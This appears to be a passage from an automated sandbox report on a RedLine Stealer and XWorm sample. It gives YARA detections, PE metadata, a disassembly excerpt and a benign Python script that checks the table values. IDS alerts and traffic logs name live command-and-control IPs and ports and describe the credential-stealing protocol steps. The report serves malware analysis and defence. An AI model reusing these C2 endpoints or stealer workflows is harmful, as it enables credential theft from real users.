                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: unknown
                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@....................................K.................................................................................... ............... ..H............text...Ds... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................ .......H...........<.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.075902702239035
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:Ekpb7jn7mf.exe
                                                                                File size:289'471 bytes
                                                                                MD5:4ce2c0836c46c61b588972b56a23d5e2
                                                                                SHA1:939a9f983870df1913acce63ca408bba9789588f
                                                                                SHA256:05df07e5e365386ae0917e177328bc12a2405a1c4317266127abb6903aac59b3
                                                                                SHA512:7b32f30b61ca8dcd9ae897d4d9e0480d8e0e2e5ae43f5f56f393d6a0dce7fa79e501c3d3609fcd288624c817401aa7f53c5f2fcdd7dda78d32c5034519d7256e
                                                                                SSDEEP:6144:+sxanyfX5k7JlJDlABKUtfU/WQcb5sDqaxw3fWHdJytaaDlNiJ:f0nyfXuIBDtfu3qaxzHdJytlM
                                                                                TLSH:FB54D06236D1C031F4B36530D9F89671AE79BC316A35A94EBBC00F6D2FB1A91C225B53
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&K.HG%.HG%.HG%.A?..SG%.A?...G%.A?..]G%.HG$..G%.A?../G%.A?..IG%.A?..IG%.A?..IG%.RichHG%.................PE..L....R.T...........
                                                                                Icon Hash:d4a684988ca4a0d5
                                                                                Entrypoint:0x41d7cb
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x54E0521F [Sun Feb 15 08:00:31 2015 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:4cfda23baf1e2e983ddfeca47a5c755a
                                                                                Instruction
                                                                                call 00007FAD787E2C8Ah
                                                                                jmp 00007FAD787DC77Dh
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                lea eax, dword ptr [ebp+08h]
                                                                                push eax
                                                                                mov esi, ecx
                                                                                call 00007FAD787DC587h
                                                                                mov dword ptr [esi], 0042B220h
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                mov dword ptr [ecx], 0042B220h
                                                                                jmp 00007FAD787DC63Ch
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                mov esi, ecx
                                                                                mov dword ptr [esi], 0042B220h
                                                                                call 00007FAD787DC629h
                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                je 00007FAD787DC909h
                                                                                push esi
                                                                                call 00007FAD787D9357h
                                                                                pop ecx
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                push edi
                                                                                mov edi, dword ptr [ebp+08h]
                                                                                mov eax, dword ptr [edi+04h]
                                                                                test eax, eax
                                                                                je 00007FAD787DC949h
                                                                                lea edx, dword ptr [eax+08h]
                                                                                cmp byte ptr [edx], 00000000h
                                                                                je 00007FAD787DC941h
                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                mov ecx, dword ptr [esi+04h]
                                                                                cmp eax, ecx
                                                                                je 00007FAD787DC916h
                                                                                add ecx, 08h
                                                                                push ecx
                                                                                push edx
                                                                                call 00007FAD787DFDB3h
                                                                                pop ecx
                                                                                pop ecx
                                                                                test eax, eax
                                                                                je 00007FAD787DC906h
                                                                                xor eax, eax
                                                                                jmp 00007FAD787DC926h
                                                                                test byte ptr [esi], 00000002h
                                                                                je 00007FAD787DC907h
                                                                                test byte ptr [edi], 00000008h
                                                                                je 00007FAD787DC8F4h
                                                                                mov eax, dword ptr [ebp+10h]
                                                                                mov eax, dword ptr [eax]
                                                                                test al, 01h
                                                                                je 00007FAD787DC907h
                                                                                test byte ptr [edi], 00000001h
                                                                                je 00007FAD787DC8E6h
                                                                                test al, 02h
                                                                                je 00007FAD787DC907h
                                                                                test byte ptr [edi], 00000002h
                                                                                je 00007FAD787DC8DDh
                                                                                xor eax, eax
                                                                                inc eax
                                                                                pop edi
                                                                                pop esi
                                                                                pop ebp
                                                                                ret
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                mov eax, dword ptr [ebp+08h]
                                                                                mov eax, dword ptr [eax]
                                                                                mov eax, dword ptr [eax]
                                                                                cmp eax, 00004F4Dh
                                                                                Programming Language:
                                                                                • [ASM] VS2008 SP1 build 30729
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [C++] VS2008 SP1 build 30729
                                                                                • [EXP] VS2008 SP1 build 30729
                                                                                • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2efa0 | 0x33 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2db7c | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x51000 | 0x519a | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2a3f0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2cc10 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2a000 | 0x384 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2878a | 0x28800 | d06d79869523ea3421d1bec81acb4dd3 | False | 0.5987172067901234 | data | 6.719347478322136 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2a000 | 0x4fd3 | 0x5000 | ae7c16bd625a124b8fbf6ecc9002c4ff | False | 0.398388671875 | data | 5.389979228626923 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2f000 | 0x21428 | 0x1600 | 6754819d963e719555064632286f5a0d | False | 0.33824573863636365 | data | 3.465549868754234 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x51000 | 0x519a | 0x5200 | cbf1086fcb5bb60c381a8a8be59ad95d | False | 0.5894150152439024 | data | 6.176452024873748 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
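A quick consistency pass over the numbers in the PE summary, data-directory and section tables above (an added example, not part of the Joe Sandbox report): it confirms which section holds the entry point and each non-empty data directory, decodes the link timestamp, and estimates how many bytes of the 289,471-byte file lie past the last section's raw data (an overlay the loader never maps). SectionAlignment and SizeOfHeaders are not printed in the report, so the values 0x1000 and 0x400 below are assumptions (the usual ones for a four-section VS2008 build); every other constant is copied from the tables.

```python
from datetime import datetime, timezone

# Values copied from the report's PE summary, data-directory and section tables.
IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x41D7CB
TIME_DATE_STAMP = 0x54E0521F
FILE_SIZE = 289471

# (name, virtual address, virtual size, raw size)
SECTIONS = [
    (".text",  0x1000,  0x2878A, 0x28800),
    (".rdata", 0x2A000, 0x4FD3,  0x5000),
    (".data",  0x2F000, 0x21428, 0x1600),
    (".rsrc",  0x51000, 0x519A,  0x5200),
]

# Non-empty data directories: name -> (RVA, size)
DATA_DIRECTORIES = {
    "EXPORT":      (0x2EFA0, 0x33),
    "IMPORT":      (0x2DB7C, 0xDC),
    "RESOURCE":    (0x51000, 0x519A),
    "DEBUG":       (0x2A3F0, 0x1C),
    "LOAD_CONFIG": (0x2CC10, 0x40),
    "IAT":         (0x2A000, 0x384),
}

# Assumptions: neither value is printed in the report; these are the usual
# values for a VS2008 build with four sections.
SECTION_ALIGNMENT = 0x1000
ASSUMED_SIZE_OF_HEADERS = 0x400


def align_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def section_for_rva(rva):
    """Name of the section whose mapped range contains rva, or None (headers/gap)."""
    for name, va, vsize, rsize in SECTIONS:
        if va <= rva < va + align_up(max(vsize, rsize), SECTION_ALIGNMENT):
            return name
    return None


def entrypoint_section():
    return section_for_rva(ENTRYPOINT_VA - IMAGE_BASE)


def directory_sections():
    """Map each data directory to its section; flag any that spills into another."""
    result = {}
    for name, (rva, size) in DATA_DIRECTORIES.items():
        start = section_for_rva(rva)
        end = section_for_rva(rva + size - 1) if size else start
        result[name] = start if start == end else f"{start}->{end}"
    return result


def timestamp_utc(stamp):
    """Decode the COFF TimeDateStamp (seconds since the Unix epoch, UTC)."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def overlay_size():
    """Bytes after the last section's raw data: present on disk, never mapped."""
    mapped = ASSUMED_SIZE_OF_HEADERS + sum(rsize for _, _, _, rsize in SECTIONS)
    return FILE_SIZE - mapped


if __name__ == "__main__":
    print("entry point section:", entrypoint_section())
    for name, where in directory_sections().items():
        print(f"{name:12s} in {where}")
    print("link time:", timestamp_utc(TIME_DATE_STAMP))
    print("overlay bytes:", overlay_size())
```

With the assumed header size the overlay comes to 75,455 bytes (a different SizeOfHeaders shifts that by a few hundred bytes at most). The dropped wjoqZlIS.exe listed above is 97,792 bytes, so it cannot sit in that overlay uncompressed; whatever the stub carries there is stored compressed or otherwise transformed.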
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x514bc | 0xbb6 | Device independent bitmap graphic, 93 x 302 x 4, 2 compression, image size 2894, resolution 2835 x 2835 px/m | English | United States | 0.2581721147431621
RT_ICON | 0x52074 | 0x1fc2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9785977859778597
RT_DIALOG | 0x54038 | 0x286 | data | English | United States | 0.5030959752321982
RT_DIALOG | 0x542c0 | 0x13a | data | English | United States | 0.6050955414012739
RT_DIALOG | 0x543fc | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x544e8 | 0x12e | data | English | United States | 0.5860927152317881
RT_DIALOG | 0x54618 | 0x338 | data | English | United States | 0.44538834951456313
RT_DIALOG | 0x54950 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x54ba4 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x54d88 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x54f54 | 0x1ee | data | English | United States | 0.451417004048583
RT_STRING | 0x55144 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x5528c | 0x446 | data | English | United States | 0.340036563071298
RT_STRING | 0x556d4 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x5583c | 0x120 | data | English | United States | 0.5451388888888888
RT_STRING | 0x5595c | 0xba | data | English | United States | 0.4946236559139785
RT_STRING | 0x55a18 | 0xa2 | data | English | United States | 0.6049382716049383
RT_GROUP_ICON | 0x55abc | 0x14 | data | | | 1.2
RT_MANIFEST | 0x55ad0 | 0x6ca | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4090909090909091
DLL | Import
COMCTL32.dll | InitCommonControlsEx
SHLWAPI.dll | SHAutoComplete
KERNEL32.dll | FindClose, FindNextFileW, FindFirstFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, GetModuleFileNameW, FindResourceW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetCurrentProcessId, GetLocaleInfoW, GetNumberFormatW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, WaitForSingleObject, GetDateFormatW, GetTimeFormatW, FileTimeToSystemTime, FileTimeToLocalFileTime, GetExitCodeProcess, GetTempPathW, MoveFileExW, UnmapViewOfFile, Sleep, MapViewOfFile, GetCommandLineW, CreateFileMappingW, GetTickCount, OpenFileMappingW, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateThread, GetProcessAffinityMask, CreateEventW, CreateSemaphoreW, ReleaseSemaphore, ResetEvent, SetEvent, SetThreadPriority, SystemTimeToFileTime, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, LocalFileTimeToFileTime, WideCharToMultiByte, MultiByteToWideChar, CompareStringW, IsDBCSLeadByte, SetFileTime, SetFileAttributesW, SetCurrentDirectoryW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoA, GetStringTypeW, GetStringTypeA, LoadLibraryA, GetConsoleMode, GetConsoleCP, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleHandleA, LCMapStringW, LCMapStringA, IsValidCodePage, GetOEMCP, GetACP, GetModuleFileNameA, ExitProcess, HeapSize, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, VirtualAlloc, VirtualFree, HeapCreate, InterlockedDecrement, GetCurrentThreadId, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, GetCommandLineA, RaiseException, GetFileAttributesW, FlushFileBuffers, ReadFile, GetFileType, SetEndOfFile, SetFilePointer, WriteFile, GetStdHandle, GetLongPathNameW, GetShortPathNameW, GlobalAlloc, MoveFileW, CreateFileW, CreateDirectoryW, DeviceIoControl, RemoveDirectoryW, DeleteFileW, CreateHardLinkW, GetCurrentProcess, CloseHandle, SetLastError, GetLastError, CreateFileA, GetCPInfo, GetSystemTimeAsFileTime, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind
USER32.dll | EnableWindow, GetDlgItem, ShowWindow, SetWindowLongW, GetDC, ReleaseDC, FindWindowExW, GetParent, MapWindowPoints, CreateWindowExW, UpdateWindow, LoadCursorW, RegisterClassExW, DefWindowProcW, DestroyWindow, CopyRect, IsWindow, CharUpperW, OemToCharBuffA, LoadIconW, LoadBitmapW, PostMessageW, GetSysColor, SetForegroundWindow, MessageBoxW, WaitForInputIdle, IsWindowVisible, DialogBoxParamW, DestroyIcon, SetFocus, GetClassNameW, SendDlgItemMessageW, EndDialog, GetDlgItemTextW, SetDlgItemTextW, wvsprintfW, SendMessageW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LoadStringW, GetWindowRect, GetClientRect, SetWindowPos, GetWindowTextW, SetWindowTextW, GetSystemMetrics, GetWindow, GetWindowLongW
GDI32.dll | GetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, DeleteDC, GetObjectW, DeleteObject, CreateDIBSection
COMDLG32.dll | GetSaveFileNameW, CommDlgExtendedError, GetOpenFileNameW
ADVAPI32.dll | RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegSetValueExW, RegCloseKey, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
SHELL32.dll | SHBrowseForFolderW, ShellExecuteExW, SHGetSpecialFolderLocation, SHFileOperationW, SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHGetFileInfoW
ole32.dll | CLSIDFromString, CoCreateInstance, OleInitialize, OleUninitialize, CreateStreamOnHGlobal
OLEAUT32.dll | VariantInit
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/16/24-21:08:49.732554 | TCP | 2852874 | ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
07/16/24-21:09:07.854397 | TCP | 2852923 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
07/16/24-21:07:40.914617 | TCP | 2855924 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
07/16/24-21:09:07.853192 | TCP | 2852870 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
07/16/24-21:09:00.501675 | TCP | 2853193 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-16T21:07:40.914617+0200 | TCP | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
2024-07-16T21:07:27.212960+0200 | TCP | 2033967 | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) | 49745 | 443 | 192.168.2.4 | 149.154.167.220
2024-07-16T21:07:13.916186+0200 | TCP | 2848200 | ETPRO MALWARE RedLine - GetUpdates Request | 49738 | 9336 | 192.168.2.4 | 147.185.221.20
2024-07-16T21:08:49.732554+0200 | TCP | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
2024-07-16T21:09:07.854397+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
2024-07-16T21:07:11.118991+0200 | TCP | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
2024-07-16T21:07:08.760906+0200 | TCP | 2840787 | ETPRO HUNTING Request for config.json | 49735 | 443 | 192.168.2.4 | 23.32.185.164
2024-07-16T21:09:07.853192+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
2024-07-16T21:07:07.874705+0200 | TCP | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
2024-07-16T21:07:08.324582+0200 | TCP | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
2024-07-16T21:07:08.868628+0200 | TCP | 2835930 | ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) | 49736 | 443 | 192.168.2.4 | 104.26.12.31
2024-07-16T21:07:09.279083+0200 | TCP | 2835929 | ETPRO POLICY External IP Address Lookup via api.ip .sb | 49736 | 443 | 192.168.2.4 | 104.26.12.31
2024-07-16T21:07:27.532720+0200 | TCP | 2045615 | ET HUNTING Telegram API Request (GET) | 49745 | 443 | 192.168.2.4 | 149.154.167.220
2024-07-16T21:07:27.532720+0200 | TCP | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 49745 | 443 | 192.168.2.4 | 149.154.167.220
2024-07-16T21:07:11.505252+0200 | TCP | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
2024-07-16T21:07:27.217238+0200 | TCP | 2029322 | ET HUNTING Telegram API Certificate Observed | 443 | 49745 | 149.154.167.220 | 192.168.2.4
2024-07-16T21:09:00.501675+0200 | TCP | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
2024-07-16T21:07:08.872910+0200 | TCP | 2833693 | ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) | 443 | 49736 | 104.26.12.31 | 192.168.2.4
2024-07-16T21:07:58.125604+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49747 | 20.12.23.50 | 192.168.2.4
2024-07-16T21:07:19.836796+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49739 | 20.12.23.50 | 192.168.2.4
2024-07-16T21:07:08.369249+0200 | UDP | 2835928 | ETPRO POLICY External IP Address Lookup DNS Query (api .ip .sb) | 53385 | 53 | 192.168.2.4 | 1.1.1.1
2024-07-16T21:07:02.736165+0200 | TCP | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
2024-07-16T21:07:08.182096+0200 | TCP | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
2024-07-16T21:07:26.559583+0200 | UDP | 2033966 | ET HUNTING Telegram API Domain in DNS Lookup | 61962 | 53 | 192.168.2.4 | 1.1.1.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 16, 2024 21:07:02.134418964 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:02.139592886 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:02.139731884 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:02.207060099 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:02.212352037 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:02.564506054 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:02.569716930 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:02.683413982 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:02.736165047 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:02.818061113 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:02.861217022 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:07.866453886 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:07.874705076 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.009381056 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.009540081 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:08.014436960 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.181982040 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.182043076 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.182096004 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:08.272368908 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.272519112 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.272550106 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.272563934 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:08.314138889 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:08.324582100 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:08.376636982 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.113349915 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.114181995 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.118990898 CEST | 9336 | 49730 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.119051933 CEST | 49730 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.119100094 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.119165897 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.119765043 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.124605894 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.470743895 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476042032 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476106882 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476109028 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476167917 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476174116 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476198912 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476227045 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476247072 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476255894 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476280928 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476285934 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476300001 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476314068 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476334095 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476341963 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476361990 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476375103 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.476377010 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.476723909 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.481967926 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.481997967 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.482017040 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.482049942 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.482050896 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.482080936 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.482109070 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.482114077 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
